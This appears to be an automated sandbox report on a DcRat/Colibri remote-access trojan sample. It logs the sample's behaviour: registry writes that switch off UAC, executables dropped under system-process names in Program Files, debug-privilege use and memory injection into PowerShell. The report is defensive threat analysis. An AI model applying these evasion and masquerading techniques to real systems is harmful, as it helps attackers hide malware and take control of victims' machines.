Malware Analysis Report

2024-11-13 16:51

Sample ID 241108-sqhwgavcnm
Target f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN
SHA256 f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcaf
Tags
dcrat evasion execution infostealer rat trojan colibri build1 discovery loader
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcaf

Threat Level: Known bad

The file f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN was found to be: Known bad.

Malicious Activity Summary

dcrat evasion execution infostealer rat trojan colibri build1 discovery loader

DcRat

Colibri Loader

UAC bypass

Dcrat family

Colibri family

Process spawned unexpected child process

DCRat payload

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Checks computer location settings

Checks whether UAC is enabled

Suspicious use of SetThreadContext

Drops file in Program Files directory

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Scheduled Task/Job: Scheduled Task

System policy modification

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-08 15:19

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-08 15:19

Reported

2024-11-08 15:21

Platform

win7-20241010-en

Max time kernel

119s

Max time network

114s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe"

Signatures

DcRat

rat infostealer dcrat

Dcrat family

dcrat

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Windows Journal\ja-JP\smss.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RCXB6F5.tmp C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\csrss.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files\Windows Photo Viewer\en-US\lsass.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files\Windows Photo Viewer\en-US\6203df4a6bafc7 C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files\Windows Photo Viewer\en-US\RCXBDFA.tmp C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files\Windows Photo Viewer\en-US\lsass.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files (x86)\Windows Photo Viewer\fr-FR\explorer.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files\Windows Journal\ja-JP\smss.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\886983d96e3d3e C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Portal\1033\RCXB947.tmp C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\b75386f1303e64 C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files (x86)\Windows Photo Viewer\fr-FR\explorer.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files\Windows Journal\ja-JP\RCXC53E.tmp C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\taskhost.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files (x86)\Microsoft Synchronization Services\cc11b995f2a76d C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\RCXB494.tmp C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\taskhost.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files (x86)\Windows Photo Viewer\fr-FR\RCXC01D.tmp C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Synchronization Services\winlogon.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files (x86)\Windows Photo Viewer\fr-FR\7a0fd90576e088 C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files\Windows Journal\ja-JP\smss.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files\Windows Journal\ja-JP\69ddcba757bf72 C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\csrss.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\Portal\1033\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\Portal\1033\e15c75ee0b3582 C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Synchronization Services\RCXB02F.tmp C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Portal\1033\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files (x86)\Microsoft Synchronization Services\winlogon.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
N/A N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
N/A N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
N/A N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
N/A N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
N/A N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
N/A N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
N/A N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1740 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
